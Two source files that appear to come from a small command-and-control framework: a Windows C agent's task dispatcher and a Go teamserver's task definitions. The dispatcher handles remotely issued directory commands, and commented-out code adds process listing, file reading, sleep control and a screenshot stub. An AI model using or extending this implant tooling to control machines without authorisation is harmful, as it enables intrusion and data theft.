File: agent/Agent/Core/Src/Tasks.c
//
// Created by j4ck on 3/22/24.
//
#include <windows.h>
#include <string.h>
#include <wchar.h>
#include <stdio.h>
#include "../Include/Agent.h"
#include "../Include/Tasks.h"
#include "../Include/Commands.h"

BOOL TaskController(IN DWORD dwTaskId, IN PCHAR pTaskArgs, OUT PBYTE *pTaskOutput) {
    printf("[+] TaskController\n TaskId: %ld\n TaskArgs: %s\n", dwTaskId, pTaskArgs);
    if (dwTaskId == 1) {
        CommandListDirectory(pTaskArgs, pTaskOutput);
    }
    else if (dwTaskId == 2) {
        CommandChangeDirectory(pTaskArgs);
    }
    return TRUE;
}



/*
BOOL TaskHandler() {
    wprintf(L"[+]TaskHandler() TaskID: %d Args: %s\n", Agent->Config.CurrentTaskId, Agent->Config.CurrentTaskArgs);
    if (Agent->Config.CurrentTaskId == 0x00) {
        return FALSE;
    }
    if (Agent->Config.CurrentTaskId == 0x01) { // List Directory
        CommandListDirectory();
    }
    if (Agent->Config.CurrentTaskId == 0x02) { // Change Directory
        CommandChangeDirectory();
    }
    if (Agent->Config.CurrentTaskId == 0x03) { // List Processes
        CommandListProcesses();
    }
    if (Agent->Config.CurrentTaskId == 0x04) { // Print Working Directory
        CommandPrintWorkingDirectory();
    }
    if (Agent->Config.CurrentTaskId == 0x05) { // Print Working Directory
        CommandCat();
    }
    if (Agent->Config.CurrentTaskId == 0x06) { // Print Working Directory
        Agent->Config.sleep = (_wtoi(Agent->Config.CurrentTaskArgs) * 1000);
    }
    if (Agent->Config.CurrentTaskId == 0x09) { // Screenshot

    }
}


*/

File: teamserver/tasks/tasks.go
package tasks

type Task struct {
	AgentId   int    `json:"agentId"` // Agent Unique ID
	CommandId int    `json:"CommandId"`
	Arguments string `json:"Arguments"`
	Mnemonic  string
}

// This is mainly for reference.
var (
	LS        = Task{CommandId: 0x01, Mnemonic: "LS", Arguments: ""}
	CD        = Task{CommandId: 0x02, Mnemonic: "CD", Arguments: ""}
	PROCESSES = Task{CommandId: 0x03, Mnemonic: "PROCESSES", Arguments: ""}
	PWD       = Task{CommandId: 0x04, Mnemonic: "PWD", Arguments: ""}
)
